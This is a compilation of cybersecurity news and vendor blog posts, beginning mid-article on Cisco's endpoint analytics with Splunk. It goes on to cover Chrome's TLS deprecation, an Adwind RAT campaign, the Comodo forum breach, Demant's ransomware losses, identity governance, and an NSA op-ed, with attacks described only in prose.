The behavioral data produced by NVM complements anti-malware agents like Cisco Advanced Malware Protection (AMP) for Endpoints that primarily focus on file analysis to detect malware on endpoints, which identifies known issues. But because CESA analyzes user and device behavior and identifies changes and anomalies, it enables threat hunters and analysts to discover malicious or suspicious endpoint activity, often without an additional endpoint agent. Where antivirus and other endpoint solutions would miss these threats, CESA provides early detection that increases security posture. CESA endpoint analytics also complements the broad network visbility provided by Cisco Stealthwatch by following endpoints on and off network, as well as enabling deep endpoint insight into down to the user account, device details and network interface levels of the endpoint.  Together CESA and Stealthwatch cover every aspect of network and endpoint behavior leaving no blind spot unchecked.  

How we address endpoint blindness

Even as security products continue to integrate, endpoint blindness is a persistent problem. Information security (infosec) teams need to know more about what is happening on the endpoints to anticipate where attacks are more likely to occur.

By leveraging the NVM telemetry that endpoints provide, we gain a better understanding of users’ network behaviors and where threats are going to happen. These insights can raise potential red flags like:

  • Are my endpoints suddenly communicating with domains we’ve not seen in our environment before?
  • Has a user changed behavior suddenly, using applications and visiting hosts they don’t usually access?
  • Does an endpoint have unusual traffic patterns? Is it uploading or downloading more than usual? Is someone hoarding or exfiltrating data?
  • Are any machines using unapproved applications or SaaS services?
  • Has security been disabled on an endpoint?
  • Which endpoints have known bad files or applications?
  • What are my users doing when they are not connected to my network?
  • Which devices and operating systems are in use in my endpoint environment?
  • Who is using each device and what are they doing with it?

It’s important to note that CESA is integrated into the Cisco Security infrastructure. CESA works together with network visibility from Cisco Stealthwatch and endpoint control from Cisco AMP for Endpoints. Additionally, Cisco Identity Services Engine (ISE) is used to quarantine users when identified as suspicious. These integrations serve to further increase the security posture of the network.

Cisco’s CSIRT team uses CESA

Many of our case studies come from our partners and customers, but this time our Cisco infosec team put together a case study as they leveraged CESA within the Cisco organization. They used the solution to collect and analyze the data generated by NVM across approximately 96,000 endpoints, and extract context such as user, device, application, location, and destination. The analysis of this data, from when the user is both on- and off-prem, helped Cisco infosec reduce incident investigation time from days to hours, while filling gaps in endpoint visibility.

“Splunk makes accessing the data from NVM, writing queries, and analyzing the data very easy,” said Cisco CSIRT’s Imran Islam.

Before CESA, the infosec team would struggle to determine which user is associated with what machine. And drilling down further was difficult if not impossible – from identifying machine to traffic; from traffic to the application or software process producing it; and then the traffic’s destination, whether inbound or outbound. It was reported by the Cisco infosec team that 80% of CESA use cases could not have been addressed by other technology.

Partnering to create a more secure network

At Cisco, we’re leading the industry in multi-vendor partnering solutions because we understand that collaboration is key to our customers having effective and efficient security across their networks — from endpoint to data center and cloud to campus. In fact, the Internet Engineering Task Force (IETF) recently standardized the XMPP-Grid security data exchange framework – based on Cisco Platform Exchange Grid (pxGrid) – which enables seamless collaboration and the sharing of information between security platforms from multiple vendors.

While no one product can achieve absolute security, no security solution exists in complete isolation. As security products become more interconnected, share context for threats, and participate in incident response, the risk of data breaches and security incidents is increasingly mitigated. This is why we believe in working so closely with our partners like Splunk through the Cisco Security Technical Alliance to integrate solutions that protect against emerging threats and improve customer security.

Splunk’s analytics-driven security solutions continue to serve as a perfect complement to Cisco Security. And we’re excited to see CESA deliver endpoint visibility and advanced threat detection for our customers. Cisco AnyConnect (Cisco’s VPN Client) is already deployed by over 150 million endpoints, and many customers are already running the Splunk console, which makes CESA a simple addition that will bring immense value for infosec’s ability to anticipate and stop endpoint threats before they manifest on the network.

If you don’t yet have these products, learn more about CESA and how you can add Cisco AnyConnect NVM and Splunk here. Stay tuned in the coming weeks for added CESA integration with Cisco Umbrella to enable enforcement at the domain level.

You can learn more about how Cisco infosec utilized CESA in this case study. 

Want to get started with CESA today? If you already have Splunk and AnyConnect, download and install the Cisco AnyConnect NVM App for Splunk from Splunkbase to create dashboards. Then, download and install the Cisco NVM Technology Add-On for Splunk from Splunkbase to bring NVM data into Splunk. Finally, turn on NVM telemetry in your AnyConnect environment as outlined in these tech docs.

Finally, be sure to follow me on Twitter and LinkedIn for the latest announcements from Cisco Security.

Rethinking how we learn security

A couple of years ago, I wrote an article on the relative lack of investor and startup interest in addressing a crucial CISO priority—the preparedness of employees on the security team. Considering what seems to be a steady stream of news about breaches, what can be done to encourage more people to get into cybersecurity and how we can better prepare cyber pros to succeed?

In my own experience, I’ve read white papers and manuals, taken bootcamps and practice tests, and slogged through hours of recorded content. It’s a lot to process, and mostly dependent on the quality of the instructor or delivery format. In this evolving threat environment, content is also outdated as soon as it’s published. Also, training security professionals are focused on certifications, not necessarily practical outcomes.

There’s also an organizational problem: Who in an enterprise owns cyber readiness? HR? A Chief Learning Officer? The CISO? If we’re going to find, hire, and retain tomorrow’s cyber workforce, we must rethink how we reach and prepare people for their careers, so they can continuously learn and stay current on the threats and the tools in front of them. With up to 2 million unfilled cyber roles, this is really a societal challenge.

One innovator that is addressing this is Boulder, Colorado-based Circadence Corporation. I met their CEO, Mike Moniz, at a cyber conference in DC. After one conversation, and upon seeing their “Project Ares®” cyber learning platform, I knew they were on to something. Since then, Circadence and Microsoft have built a very promising partnership to help Circadence scale globally to reach and train more of tomorrow’s cyber workforce. They’re doing this by using Azure infrastructure and platform services; and enjoy the partnership and help.

Circadence focuses on cybersecurity learning and readiness. They build and run immersive, gamified cyber ranges that create a real-time cyber learning environment. In particular is Project Ares, which supports all security proficiency levels of an individual or team—from early career starters to seasoned cyber professionals—for enterprise, government, and academic organizations. Artificial intelligence (AI) powers the delivery of gamified training exercises in battle room and mission virtual machine environments based on actual cyberattack scenarios happening today—such as ransomware, advanced persistent threats, and attacks against industrial control systems.

I signed up for a Circadence account and gave it a shot. I’m not a gamer, but I was really impressed with the UI. Was Circadence actually trying to make learning fun? Project Ares is rooted in proven learning theories and cognitive research. They used resources like Bloom’s Taxonomy of Learning and educational concepts like “reinforcement learning” and “cognitive disfluency” (interrupting the flow of learning with the inclusion of testing, questionnaires, and polls) to match accepted learning concepts with gamified experiences. This isn’t just about making a video game for cyber. And it isn’t just “fun” but informative, educational, practical, and equally innovative without being intimidating.

The learning scenarios are immersive and address varied learning styles, which are two critical design points for maintaining player engagement and lengthening attention span. The platform draws learners across the stages of Bloom’s Taxonomy by:

  • Starting with explanations of techniques, skills, or adversary tactics.
  • Progressing through application of those skills in controlled battle rooms.
  • Arriving at the synthesis of skills and critical thinking to analyze, evaluate, and take actions in an emulated, high-fidelity network against actual malware and emulated threat actors.

Project Ares provides multiple scenarios along a work-role learning path, where you’re required to not only read about cybersecurity, but also must evaluate events in a true network and generate options to achieve objectives. The current catalog contains over 30 cyber games, battle rooms, and missions that provide exposure and experience across many of NIST’s National Initiative on Cybersecurity Education (NICE) work roles in a modern, engaging way.

To learn more about security team training on gamified cyber security ranges in Azure, I sat down with Keenan Skelly, Vice President of Global Partnerships and Security Evangelist. You can watch my interview with Keenan.

This was a great overview of a partner thinking ahead in a creative way to address a major problem in cyber. I encourage anyone interested in improving their own cyber skills, or their team’s skills, to look at gamified learning. Given how younger people interact with IT, it’ll be increasingly important in how we attract them to the industry.

In my next post, I’ll dive deeper into practical learning and defender exercises. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Rethinking how we learn security appeared first on Microsoft Security.

Chrome UI for Deprecating Legacy TLS Versions


[Cross-posted from the Chromium blog]

Last October we announced our plans to remove support for TLS 1.0 and 1.1 in Chrome 81. In this post we’re announcing a pre-removal phase in which we’ll introduce a gentler warning UI, and previewing the UI that we’ll use to block TLS 1.0 and 1.1 in Chrome 81. Site administrators should immediately enable TLS 1.2 or later to avoid these UI treatments.
While legacy TLS usage has decreased, we still see over 0.5% of page loads using these deprecated versions. To ease the transition to the final removal of support and to reduce user surprise when outdated configurations stop working, Chrome will discontinue support in two steps: first, showing new security indicators for sites using these deprecated versions; and second, blocking connections to these sites with a full page warning.
Pre-removal warning
Starting January 13, 2020, for Chrome 79 and higher, we will show a “Not Secure” indicator for sites using TLS 1.0 or 1.1 to alert users to the outdated configuration:
The new security indicator and connection security information that will be shown to users who visit a site using TLS 1.0 or 1.1 starting in January 2020.

When a site uses TLS 1.0 or 1.1, Chrome will downgrade the security indicator and show a more detailed warning message inside Page Info. This change will not block users from visiting or using the page, but will alert them to the downgraded security of the connection.
Note that Chrome already shows warnings in DevTools to alert site owners that they are using a deprecated version of TLS.
Removal UI
In Chrome 81, which will be released to the Stable channel in March 2020, we will begin blocking connections to sites using TLS 1.0 or 1.1, showing a full page interstitial warning:
The full screen interstitial warning that will be shown to users who visit a site using TLS 1.0 or 1.1 starting in Chrome 81. Final warning subject to change.

Site administrators should immediately enable TLS 1.2 or later. Depending on server software (such as Apache or nginx), this may be a configuration change or a software update. Additionally, we encourage all sites to revisit their TLS configuration. In our original announcement, we outlined our current criteria for modern TLS.
Enterprise deployments can preview the final removal of TLS 1.0 and 1.1 by setting the SSLVersionMin policy to “tls1.2”. This will prevent clients from connecting over these protocol versions. For enterprise deployments that need more time, this same policy can be used to re-enable TLS 1.0 or TLS 1.1 and disable the warning UIs until January 2021.

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back, a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRATAlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign, the spam messages come with malicious attachments or include URL to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java, it was observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first discovered early 2012, the experts dubbed it Frutas RAT and later it was identified with other names, Unrecom RAT (February 2014), AlienSpy (October 2014), and recently JSocket RAT (June 2015).

Adwind is could infect all the major operating systems, including Windows, Mac, Linux, and Android, it is available in the cybercrime underground as a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer it can recruit it into a botnet for several illegal purposes (i.e. DDoS attacks, brute-forcing attacks).

Experts pointed out that the functionality of the RAT has remained the same as previous variants, the major change is in the obfuscation technique it implements. The malware uses delivers RAT payloads via nested JAR archives. The Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur.” continues the analysis

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58.” conclude the expert. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netyskope’s report includes Indicators of compromise (IOCs), malware sample hashes for various JAR payloads used in these attacks, and IP addresses and domains of C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

The post A new Adwind variant involved in attacks on US petroleum industry appeared first on Security Affairs.

Six Strategies to Ensure You Give the Right Access to the Right People at the Right Time

Part 2 of the Improving Your Security-Efficiency Balance Series:  

One of the primary challenges organizations wrestle with in identity governance is how to achieve the right balance in their company between security and efficiency. In Part 1 of the Improving Your Security-Efficiency Balance Series, we examined the unique balancing act organizations face when it comes to user access. In this blog, we will examine practical ways you can create this balance to ensure access is only given to those users who absolutely need it. Let’s take a look at six key ways to help you reach a practical balance between these priorities, so you can enable access that is necessary for your organization to remain competitive in today’s business environment and be confident you are managing access risks appropriately. Striking the right balance ultimately comes down to adopting a comprehensive, strategic, and intelligent approach to identity governance and administration in your organization.

1) Automate Provisioning Around the User Lifecycle

One way to increase the balance between security concerns and the desire for user efficiency is to automate provisioning actions based on the user’s lifecycle within an organization. This typically starts during the user’s first relationship with an organization as a job applicant or employee, and concludes with the user separating from the organization. In between these events are multiple changes and access requirements that must be managed closely.

The first step in the user lifecycle is onboarding. This is where a new employee, or a non-employee like a contractor or vendor, receives initial accounts and access to appropriate systems and applications. Once onboarded, a user may need new or different access when transferred. This occurs typically when an employee changes job roles, moves to a new department, or reports to a new manager. And finally, the last part of the user lifecycle is when an employee leaves the organization, either voluntarily or through termination. For the latter, accounts should be quickly and automatically disabled, preventing any opportunity for employees to retain access to data upon their departure from the organization.

Automating provisioning around the user lifecycle truly enables employees to be productive on day one rather than waiting around for access. It also decreases the reliance on IT resources and increases security by reducing risk associated with manual provisioning mistakes. At the very least, when provisioning automation is not practical or feasible, automated workflow and access policies for requesting, approving, tracking, and auditing should be deployed. This is where a role-based approach to developing these access policies often works best.

2) Adopt a Role-Based Approach

Another effective way to improve balance is by leveraging role-based access policies. Think of a role as a collection of access privileges typically defined around a job title or job function. Using roles, organizations have solid, predefined, and preapproved access policies in place, and know specifically which access privileges each person needs. Embracing a role-based approach simplifies identity governance and administration, and aids organizations particularly as they grow and change—whether through individual changes across the user lifecycle, seasonal additions to the workforce, or more institutional changes, like mergers and acquisitions.

3) Leverage a One-Stop Shop for User Access

Even with well-defined roles to make onboarding and institutional changes more effective, secure and efficient, additional access and ad-hoc changes are always ‘the norm.’ To also make this effective, a centralized portal to complete access requests and approvals should be deployed. Providing a one-stop shop for users to request additional access ensures employees go through proper channels, and reinforces that proper approval and fulfillment policies are followed. A centralized system makes it really easy for users to request access across various applications. And it also provides consistent and business friendly methods to request that access. Another advantage of a one-stop shop is the consistent audit trail of requests and approvals, providing organizations with an updated status of each access request.

4) Conduct Frequent Access Reviews

Frequent access reviews or certifications are another key area for improving the balance between security and efficiency. Within the climate of regulatory compliance and security, it’s imperative to review user access periodically. Access reviews must be simple and easy to manage so managers do not just rubber stamp their approvals. Rather than a manual process where organizations pass around spreadsheets among reviewers, a more intelligent, visual solution is a must-have to group like-access privileges together. This enables managers to understand which users have access to specific systems, and which users are outliers in their privileges. After all, an easier review process leads to greater accuracy, improved reporting, and greater adoption within the organization.

5) Take Advantage of Automated Micro-Certifications

Since the time between new provisioning and an organization’s next audit or review process can be fairly lengthy, it is important to have a set of controls that can quickly identify anomalous access, especially when that access violates an important policy, such as segregation of duties or privileged access. This can be done through the use of micro-certifications. This means that when an access event is triggered where an employee may have new or different access and entitlements than what is expected, or gains access through an outside process, commonly referred to as out of band, a manager or business application owner will be alerted and can perform an access review immediately associated with the risk event. This significantly reduces insider threats and also enables organizations to meet regulatory compliance, while allowing for business exceptions that might be necessary. 

6) Enforce Strong Password Policies

Few employees today remember to change their passwords that were originally provided, so it is important to have frequent mandatory password resets. It is also important to maintain password policies that enforce complexity and non-reuse rules. However, the problem with these resets is that employees may forget their updated passwords, requiring additional IT resources to support a reset. That is why it’s important to have a strong self-service password solution that enables users to securely reset passwords on their own. Leading password reset solutions allow users to also unlock their accounts through self-service mechanisms. A variety of password reset options, such as a mobile reset application or telephone-based keypad resets, Windows Credential Provider and voice biometrics, help increase user adoption rates, while maintaining a secure reset channel. This frees up helpdesk time and allows IT teams to work on more strategic initiatives.

The Real Impact of Intelligent Identity Governance on Security and User Efficiency

When organizations effectively leverage an intelligent identity governance and administration program using these six strategies, they will ultimately gain greater balance between improving organizational security and enhancing individual productivity. From automating and centralizing access approvals to meeting ever-increasing auditor demands, leading-edge IGA solutions from Core Security empower companies—even those restricted by limited resources—to become more secure and more efficient, and to gain confidence that the right people have the right access levels to the right systems at the right time.

Undefined
Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs
Are you ready to strike the right balance between security and efficiency in your organization?

Get a live demo of our IGA solutions from one of our experts today.

Sophos Managed Threat Response: An evolved approach to proactive security protection

In its 2019 market guide for managed detection and response (MDR) services, Gartner forecasted that by 2024, 25% of organizations will be using MDR services, up from less than 5% today. While the percentage might not end up as high as that, there’s no doubt that the demand for these services will increase rapidly, fueled by organizations’ inability to acquire, train and retain cybersecurity talent and to keep pace with the rising sophistication and complexity … More

The post Sophos Managed Threat Response: An evolved approach to proactive security protection appeared first on Help Net Security.

Hackers breached one of Comodo Forums, 245,000 users impacted

The ITarian Forum, the Comodo discussion board and support forums, has been hacked and data belonging to nearly 245,000 registered users were exposed.

Hackers breached the ITarian Forum, the Comodo discussion board and support forums, accessing login credentials of nearly 245,000 users registered with the Comodo Forums websites. Comodo has not specified which of its two forums has been hacked. Exposed data include login username, name, email address, hashed passwords, last IP address used to access the forums, and some social media usernames for a limited number of users.

“Very recently a new vulnerability in the vBulletin software, which is one of the most popular server applications for website comments including the Comodo Forums, was made public.” reads the security notice published by Comodo. “Over the weekend at 4:57 am ET on Sunday September 29, 2019, we became aware that this security flaw in the vBulletin software had become exploited resulting in a potential data breach on the Comodo Forums.

“Our IT infrastructure team immediately took steps to mitigate the exploit by taking the forums offline and applying the recommended patches.”

comodo data breach

Comodo attempted to reassure its forum users saying that its staff immediately took the forums offline to apply the necessary countermeasures.

The attackers exploited the recently disclosed zero-day vulnerability in vBulletin (CVE-2019-16759).

The hack of Comodo forum took place on September 29, a few days after vBulletin developers have released a patch to address it, this means that for some reason administrators at Comodo failed in applying it.

vBulletin is one of the most popular forum software, for this reason, the disclosure of a zero-day flaw affecting it could impact a wide audience. More than 100,000 websites online run on top of vBulletin.

On September 24, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin.

Two days later, the security expert Troy Mursch of Bad Packets observed a botnet that it utilizing the recently disclosed vBulletin exploit to secure vulnerable servers to avoid that can be compromised by other threat actors. This technique is not new and allows them to preserve their own botnet.

Currently, Comodo operates two forums, “forums.comodo.com,” and ITarian Forum hosted at “forum.itarian.com,” the former runs on the Simple Machines Forum software, while the latter is based on vBulletin.

For this reason, hackers likely breached the ITarian Forum that is used as a discussion board for its customers searching for technical information and assistance.

“As a precautionary measure we recommend that forum users should immediately change their passwords and exercise good password practices such as strong random passwords and not share your passwords across different Internet accounts.” recommends Comodo. “The account passwords were encrypted in vBulletin for the Comodo Forum users, but a password change is recommended as part of good password practices.”“We deeply regret any inconvenience or distress this vulnerability may have caused you, our users,” the company says.

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post Hackers breached one of Comodo Forums, 245,000 users impacted appeared first on Security Affairs.

Danish company Demant expects to suffer huge losses due to cyber attack

Danish hearing health care company Demant has estimated it will lose between $80 and $95 million due to a recent “cyber-crime” attack. Though the company has yet to share details about the “IT infrastructure incident”, it is widely believed to be the work of ransomware-wielding attackers. What is known? The attack started on September 2 and, apparently, the company quickly decided to shut down IT systems across multiple sites and business units: Still, the reaction … More

The post Danish company Demant expects to suffer huge losses due to cyber attack appeared first on Help Net Security.

Why MSPs Should Expect No-Conflict Endpoint Security

Reading Time: ~ 3 min.

“Antivirus programs use techniques to stop viruses that are very “virus-like” in and of themselves, and in most cases if you try to run two antivirus programs, or full security suites, each believes the other is malicious and they then engage in a battle to the death (of system usability, anyway).”

“…running 2 AV’s will most likely cause conflicts and slowness as they will scan each other’s malware signature database. So it’s not recommended.”

The above quotes come from top answers on a popular computer help site and community forum in response to a question about “Running Two AVs” simultaneously.

Seattle Times tech columnist Patrick Marshall has similarly warned his readers about the dangers of antivirus products conflicting on his own computers.

Click here to see 9 top endpoint protection competitors go head to head to see who’s most efficient.

Historically, these comments were spot-on, 100% correct in describing how competing AV solutions interacted on endpoints. Here’s why.

The (Traditional) Issues with Running Side-by-Side AV Programs

In pursuit of battling it out on your machine for security supremacy, AV solutions have traditionally had a tendency to cause serious performance issues.

This is because:

  • Each is convinced the other is an imposter. Antivirus programs tend to look a lot like viruses to other antivirus programs. The behaviors they engage in, like scanning files or scripts and exporting information about those data objects, can look a little shady to a program that’s sole purpose is to be on the lookout for suspicious activity.
  • Each wants to be the anti-malware star. Ideally both AV programs installed on a machine would be up to the task of spotting a virus on a computer. And both would want to let the user know when they’d found something. So while one AV number one may isolate a threat, you can bet AV number two will still want to alert the user to its presence. This can lead to an endlessly annoying cycle of warnings, all-clears, and further warnings.
  • Both are hungry for your computer’s limited resources. Traditional antivirus products store static lists of known threats on each user’s machine so they can be checked against new data. This, plus the memory used for storing the endpoint agent, CPU for scheduled scans, on-demand scans, and even resource use during idling can add up to big demand. Multiply it by two and devices quickly become sluggish.

Putting the Problem Into Context

Those of you reading this may be thinking, But is all of this really a problem? Who wants to run duplicate endpoint security products anyway?

Consider a scenario, one in which you’re unhappy with your current AV solution. Maybe the management overhead is unreasonable and it’s keeping you from core business responsibilities. Then what?

“Rip and replace”—a phrase guaranteed to make many an MSP shudder—comes to mind. It suggests long evenings of after-hours work removing endpoint protection from device after device, exposing each of the machines under your care to a precarious period of no protection. For MSPs managing hundreds or thousands of endpoints, even significant performance issues can seem not worth the trouble.

Hence we’ve arrived at the problem with conflicting AV software. They lock MSPs into a no-win quagmire of poor performance on the one hand, and a potentially dangerous rip-and-replace operation on the other.

But by designing a no-conflict agent, these growing pains can be eased almost completely. MSPs unhappy with the performance of their current AV can install its replacement during working hours without breaking a sweat. A cloud-based malware prevention architecture and “next-gen” approach to mitigating attacks allows everyone to benefit from the ability to change and upgrade their endpoint security with minimal effort.

Simply wait for your new endpoint agent to be installed, uninstall its predecessor, and still be home in time for dinner.

Stop Wishing and Expect No-Conflict Endpoint Protection

Any modern endpoint protection worth its salt or designed with the user in mind has two key qualities that address this problem:

  1. It won’t conflict with other AV programs and
  2. It installs fast and painlessly.

After all, this is 2019 (and over 30 years since antivirus was invented) so you should expect as much. Considering the plethora of (often so-called) next-gen endpoint solutions out there, there’s just no reason to get locked into a bad relationship you can’t easily replace if something better comes along.

So when evaluating a new cybersecurity tool, ask whether it’s no conflict and how quickly it installs. You’ll be glad you did.

The post Why MSPs Should Expect No-Conflict Endpoint Security appeared first on Webroot Blog.

NSA on the Future of National Cybersecurity

Glenn Gerstell, the General Counsel of the NSA, wrote a long and interesting op-ed for the New York Times where he outlined a long list of cyber risks facing the US.

There are four key implications of this revolution that policymakers in the national security sector will need to address:

The first is that the unprecedented scale and pace of technological change will outstrip our ability to effectively adapt to it. Second, we will be in a world of ceaseless and pervasive cyberinsecurity and cyberconflict against nation-states, businesses and individuals. Third, the flood of data about human and machine activity will put such extraordinary economic and political power in the hands of the private sector that it will transform the fundamental relationship, at least in the Western world, between government and the private sector. Finally, and perhaps most ominously, the digital revolution has the potential for a pernicious effect on the very legitimacy and thus stability of our governmental and societal structures.

He then goes on to explain these four implications. It's all interesting, and it's the sort of stuff you don't generally hear from the NSA. He talks about technological changes causing social changes, and the need for people who understand that. (Hooray for public-interest technologists.) He talks about national security infrastructure in private hands, at least in the US. He talks about a massive geopolitical restructuring -- a fundamental change in the relationship between private tech corporations and government. He talks about recalibrating the Fourth Amendment (of course).

The essay is more about the problems than the solutions, but there is a bit at the end:

The first imperative is that our national security agencies must quickly accept this forthcoming reality and embrace the need for significant changes to address these challenges. This will have to be done in short order, since the digital revolution's pace will soon outstrip our ability to deal with it, and it will have to be done at a time when our national security agencies are confronted with complex new geopolitical threats.

Much of what needs to be done is easy to see -- developing the requisite new technologies and attracting and retaining the expertise needed for that forthcoming reality. What is difficult is executing the solution to those challenges, most notably including whether our nation has the resources and political will to effect that solution. The roughly $60 billion our nation spends annually on the intelligence community might have to be significantly increased during a time of intense competition over the federal budget. Even if the amount is indeed so increased, spending additional vast sums to meet the challenges in an effective way will be a daunting undertaking. Fortunately, the same digital revolution that presents these novel challenges also sometimes provides the new tools (A.I., for example) to deal with them.

The second imperative is we must adapt to the unavoidable conclusion that the fundamental relationship between government and the private sector will be greatly altered. The national security agencies must have a vital role in reshaping that balance if they are to succeed in their mission to protect our democracy and keep our citizens safe. While there will be good reasons to increase the resources devoted to the intelligence community, other factors will suggest that an increasing portion of the mission should be handled by the private sector. In short, addressing the challenges will not necessarily mean that the national security sector will become massively large, with the associated risks of inefficiency, insufficient coordination and excessively intrusive surveillance and data retention.

A smarter approach would be to recognize that as the capabilities of the private sector increase, the scope of activities of the national security agencies could become significantly more focused, undertaking only those activities in which government either has a recognized advantage or must be the only actor. A greater burden would then be borne by the private sector.

It's an extraordinary essay, less for its contents and more for the speaker. This is not the sort of thing the NSA publishes. The NSA doesn't opine on broad technological trends and their social implications. It doesn't publicly try to predict the future. It doesn't philosophize for 6000 unclassified words. And, given how hard it would be to get something like this approved for public release, I am left to wonder what the purpose of the essay is. Is the NSA trying to lay the groundwork for some policy initiative ? Some legislation? A budget request? What?

Charlie Warzel has a snarky response. His conclusion about the purpose:

He argues that the piece "is not in the spirit of forecasting doom, but rather to sound an alarm." Translated: Congress, wake up. Pay attention. We've seen the future and it is a sweaty, pulsing cyber night terror. So please give us money (the word "money" doesn't appear in the text, but the word "resources" appears eight times and "investment" shows up 11 times).

Susan Landau has a more considered response, which is well worth reading. She calls the essay a proposal for a moonshot (which is another way of saying "they want money"). And she has some important pushbacks on the specifics.

I don't expect the general counsel and I will agree on what the answers to these questions should be. But I strongly concur on the importance of the questions and that the United States does not have time to waste in responding to them. And I thank him for raising these issues in so public a way.

I agree with Landau.

Slashdot thread.

Comodo Forums Hack Exposes 245,000 Users’ Data — Recent vBulletin 0-day Used

If you have an account with the Comodo discussion board and support forums, also known as ITarian Forum, you should change your password immediately. Cybersecurity company Comodo has become one of the major victims of a recently disclosed vBulletin 0-day vulnerability, exposing login account information of over nearly 245,000 users registered with the Comodo Forums websites. In a brief

Danish company Demant expects to incur losses of up to $95 after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused important problems to its operations, the company has yet to recover after the attack, a circumstance that suggests it was hit by a ransomware attack.

Demant expects to incur losses of up to $95 million following the incident, which includes a deduction of $14.6 million of expected insurance coverage.

We are therefore talking about figures that come into the list of the most important losses caused by cyber attacks.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransom incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported ComputerWord.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant network have not been able to regularly provide to their service to end-users.

The impact is predominately related to the estimated lost sales and on the growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is important because demonstrates the potential impact of a cyber attack on organizations and urges them to adopt necessary countermeasures.

The massive NotPetya ransomware attack caused billions of dollars to organizations worldwide, the shipping giant Maersk and courier service FedEx incurred in over $300 million each. In April, the Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 after cyber attack appeared first on Security Affairs.

Carbon Black: Defense Capabilities Match Increased Attack Sophistication

Carbon Black: Defense Capabilities Match Increased Attack Sophistication

While businesses are seeing an increase in attack sophistication, and the overall attack volume in the past 12 months has increased, defense is getting better.

According to research by Carbon Black of 250 British CTOs and CISOs, 84% of UK businesses reported an increase in overall attack volume while 90% cited more sophistication.

Speaking to Infosecurity, Rick McElroy, head of security strategy at Carbon Black, said that these statistics were due to what he called the “trickle down cyber-economy for adversaries” where nation state actors, cyber-militias and contractors working for them develop multi-million dollar tools which get into the wild – such as the exploits which enabled WannaCry and NotPetya to spread.

“As new capabilities and ammunition are developed, you’ll see that move into things like ransomware,” he explained. “Secondary, [offense] is not a highly specialized skill anymore, a lot of people are trained in it, and you can buy a lot of capabilities on the dark web. So the rise is down to more people being involved, and the sophistication is down to the cyber-economy, but defenders do have better tools.”

On that point, McElroy said that because there is better tooling in prevention and detection, the adversary has to improve and become more “stealthy.”

Asked if the state of cybersecurity was improving for defenders, McElroy said he believed it was getting better as “people are starting to sleep a bit more” and getting some of things that they need thanks to budget approval. “It comes back to how to make the army bigger, and recruit successfully as people look at ‘non-traditional areas’” he said.

The research found that 76% of UK organizations were more confident in their ability to repel cyber-attacks than they were 12 months ago.

McElroy said: “As the cyber-defense sector continues to mature, businesses are becoming more aware of the tools at their disposal and the tactics they can use to combat cyber-attacks. We believe this growing confidence is indicative of a power shift in favor of defenders, who are taking a more proactive approach to hunting out and neutralizing threats than previously.”

He praised the MITRE ATT&CK framework as enabling defenders as it made vendors improve their technology, and pointed out that there is a feeling that defenders have better tools than ever before “which is definitely increasing the confidence that they have” as things can be found in environments that otherwise would not have been known about.

